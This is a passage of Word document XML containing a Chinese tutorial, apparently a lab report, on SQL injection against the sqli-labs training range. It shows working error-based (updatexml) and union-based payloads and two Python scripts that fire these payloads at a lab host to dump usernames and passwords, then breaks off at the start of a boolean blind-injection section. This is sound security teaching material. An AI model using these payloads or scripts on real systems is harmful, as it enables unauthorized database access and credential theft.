      <w:r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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>报错注入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顾名思义，依靠报错信息来注入，即通过构造错误的sql语句触发报错信息返回，通过这个报错信息外带出其他数据（攻击者想要获取到的一些信息）。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报错注入涉及到多种方法，其实也就是多种触发报错的条件/函数。这里我们仅列举一种作为示例：updatexml()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首先了解一下这个函数：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="480" w:firstLine="2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b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATEXML (XMLdocument, XPathstring, new_value); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">第一个参数：XMLdocument是String格式，为XML文档对象的名称，文中为Doc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">第二个参数：XPathstring (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">第三个参数：new_value，String格式，替换查找到的符合条件的数据 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报错原理：由于updatexml的第二个参数需要Xpath格式的字符串，因此在输入的字符不符合Xpath格式时会进行报错。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下面具体分析一下这个靶场的Less-1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首先输入?id=1页面正常回显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接着输入?id=1' 由于输入中包含一个单引号，因此正常的逻辑出错</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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334000" cy="935355"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445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359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jc w:val="center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图5.5-1 加单引号后的回显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可以看一下这个报错原因，这里需要注意一点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  <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4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use near ''1'' LIMIT 0,1' at line 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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这里的第一对单引号直接忽略（报错提示该条信息是字符串）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剩下的'1'' LIMIT 0,1才是被执行的sql语句中的一部分。这样可以分析出后端的语句对于id关键字采用的单引号包裹。（可以到less-1目录下查看源码确实如此）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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334000" cy="802640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0290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jc w:val="center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图5.5-2 对应的后端代码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了解过数据库基本的语法知识，我们便可以通过闭合的方式构造注入。这里既然给出了报错信息，我们就直接采用报错注入的方式。payload如下：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3F4F4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' or updatexml(1,concat(0x7e,user()),1) --+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此处0x7e只是个标志符（其他任何不属于xml格式开头的字符都行）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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724400" cy="1013460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jc w:val="center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图5.5-3 报错注入获得相应提示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由于该sql语句调用执行先后顺序，会优先执行user()，concat()最后updatexml时报错，将user()结果外带出来。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下面通过报错注入获取superman用户的密码：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1. 首先通过替换user()为所需要的payload，来获取数据库信息。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http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1' or updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata)),1) --</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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从而获取到如下结果：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XPATH syntax error: '~information_schema,aaa,catfish,'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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数据库显然不仅只有几个，而这里之所以只显示了这些，是因为updatexml函数报错最多显示32位，因此这里用到一个截断函数substr，来截取所获得内容的某些部分。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而另外一种可选方案是利用limit来选取。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http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1' or updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1)),1) -</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>-+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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通过直接替换user()为常用注入的第一个payload（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>select schema_name from information_schema.schemata</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）获取数据库，会发现出现预期外的错误。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Subquery returns more than 1 row</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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这是因为查询到了多行数据，此处提示我们只能有一行回显，因此可以用limit来代替上述的group_concat函数（该函数将查询结果以逗号分隔连接成一行结果）。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通过更改limit x,1找到数据库security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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同样的方法继续查找该数据库中的表，找到users表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http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1) --</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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接着同样的方法找到users表下的username和password字段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c>
          <w:tcPr>
            <w:tcW w:w="8856" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3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http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1' or updatexml(1,concat(0x7e,(Select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1)),1) --</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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确定了数据库、表、列结构以后就可以查出superman的password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c>
          <w:tcPr>
            <w:tcW w:w="8856" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3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http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1' or updatexml(1,concat(0x7e,(select password from security.users where username='superman' limit 0,1)),1) --</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="333333"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:firstLine="720" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>最终的脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>）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856"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8856" w:type="dxa"/>
          </w:tcPr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  <w:t>def error_based_sql_injection(sql: str) -&gt; None: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  <w:t xml:space="preserve">    url = "http://47.115.154.103:8848/Less-1/?id=1' and updatexml(1, (concat(0x7e, ({}))),1) --+".format(sql)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  <w:t xml:space="preserve">    res = requests.get(url=url)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  <w:t xml:space="preserve">    if "XPATH syntax error" in res.text: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  <w:t xml:space="preserve">        data = res.text[res.text.find("XPATH syntax error") + len("XPATH syntax error: "):]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  <w:t xml:space="preserve">        data = data[:data.find("&lt;/font&gt;")]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  <w:t xml:space="preserve">        print(data)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  <w:t>def error_based_injection():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  <w:t xml:space="preserve">    sql_tables = "select group_concat(table_name) from information_schema.tables where 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  <w:t xml:space="preserve">                 "table_schema=database()"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  <w:t xml:space="preserve">    error_based_sql_injection(sql_tables)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  <w:t xml:space="preserve">    sql_columns = "select group_concat(column_name) from information_schema.columns where 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  <w:t xml:space="preserve">                  "table_name = 'users'"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  <w:t xml:space="preserve">    error_based_sql_injection(sql_columns)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  <w:t xml:space="preserve">    sql_username = "select group_concat(username) from users"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  <w:t xml:space="preserve">    error_based_sql_injection(sql_username)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  <w:t xml:space="preserve">    sql_password = "select group_concat(password) from users"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val="en-US" w:eastAsia="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve">    error_based_sql_injection(sql_password)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>注入的结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>，～</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>是由于updatexml报错的回显信息</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5481320" cy="1578610"/>
            <wp:effectExtent l="0" t="0" r="5080" b="215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20" w:beforeLines="50" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.5.2</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>union注入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union联合查询，同样以less-1举例，通过输入不同的id可以发现不同的回显，回显的位置位于Login name和Password后面的字段（具体后端是什么字段并不需要考虑），可初步猜测原本的select语句选取的列数为2列。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请思考：为什么要提到select的列数？以及为什么要关心回显位置（这里位置指具体哪一列）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="27"/>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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接下来介绍两种确定列数的方法：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="80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lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>order by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将查询出来的结果按照某列进行排序，因此当我们以1、2、3作为第1、2、3列进行排序时，依次增大，到某一整数n时报错，即说明该列不存在，n-1列是存在的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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505200" cy="975360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jc w:val="center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图5.5-4 报错提示列数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使用下面的payload发生了报错，因此确定出只有3列。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  <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4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http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=1' order by 4 --+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="80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union select 1,2,3....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直接union select 确定列数的同时可判断出回显位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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334000" cy="119380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9417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jc w:val="center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图5.5-5 确定列数和回显位置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  <w:shd w:val="clear" w:color="auto" w:fill="F3F4F4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http://127.0.0.1/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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如上图当payload直接联合查询1,2,3时发现回显位置为第二列和第三列。并且列数为3。当选择select 1,2或者select 1,2,3,4都会得到关于"列数不同的报错"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请自行实验通过union联合注入获取superman用户的密码。（参考报错注入使用的payload）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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我的payload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56" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/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  <w:t>def union_based_sql_injection(sql: str) -&gt; None:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/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  <w:t xml:space="preserve">    url = "http://47.115.154.103:8848/Less-1/?id=-1' union {};--+".format(sql)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/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  <w:t xml:space="preserve">    res = requests.get(url=url)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/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  <w:t xml:space="preserve">    symbols = "Your Login name:"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/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  <w:t xml:space="preserve">    # print(res.text)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/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  <w:t xml:space="preserve">    if symbols in res.text:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/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  <w:t xml:space="preserve">        data = res.text[res.text.find(symbols) + len(symbols):]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/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  <w:t xml:space="preserve">        data = data[:data.find("&lt;br&gt;")]</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/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  <w:t xml:space="preserve">        print(data)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/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  <w:t>def union_based_injection():</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480" w:firstLineChars="200"/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  <w:t>sql_tables = "select 1, group_concat(table_name),3  from information_schema.tables where table_schema=database()"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/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  <w:t>union_based_sql_injection(sql_tables)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/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  <w:t>sql_columns = "select 1, group_concat(column_name), 3 from information_schema.columns where</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:szCs w:val="22"/>
                <w:lang w:eastAsia="zh-Hans"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r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  <w:t>table_name = 'users'"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/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  <w:t>union_based_sql_injection(sql_columns)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/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  <w:t>sql_username = "select 1, group_concat(username), 3 from users"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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  <w:t>union_based_sql_injection(sql_username)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480"/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  <w:t>sql_password = "select 1, group_concat(password), 3 from users"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:ind w:firstLine="480" w:firstLineChars="200"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="FF0000"/>
                <w:vertAlign w:val="baseline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2"/>
                <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
              </w:rPr>
              <w:t>union_based_sql_injection(sql_password)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsiaTheme="minorEastAsia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注入的结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>得到的数据太多了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US" w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>有点显示不下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:color w:val="FF0000"/>
          <w:lang w:eastAsia="zh-Hans"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5474335" cy="654050"/>
            <wp:effectExtent l="0" t="0" r="12065" b="635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20" w:beforeLines="50" w:after="120" w:afterLines="50" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5.5.3</w:t>
      </w:r>
      <w:r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  <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>布尔注入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所谓的盲注，即数据库语句执行以后，无法将结果回显，此时的注入对于攻击者来说无法轻易得到执行结果，处于盲视野状态。布尔盲注即可以理解为利用布尔特性（0和1的不同回显）来确定数据库执行情况。听起来有点抽象，来看具体分析。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首先既然要利用不同的布尔值进行不同的回显，那么就需要构造"条件语句"。在mysql中我们可以直接利用if函数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以Less-8为例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输入id=1发现回显的内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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334000" cy="1382395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8247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jc w:val="center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图5.5-6 id=1的回显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简单测试后发现输入id=1、2、3...、12都是回显"You are in....."，当输入id=13或者id=-1等不符合规则的的情况时无任何回显。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/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334000" cy="1190625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9105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jc w:val="center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图5.5-7 不规则输入时的回显</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="36"/>
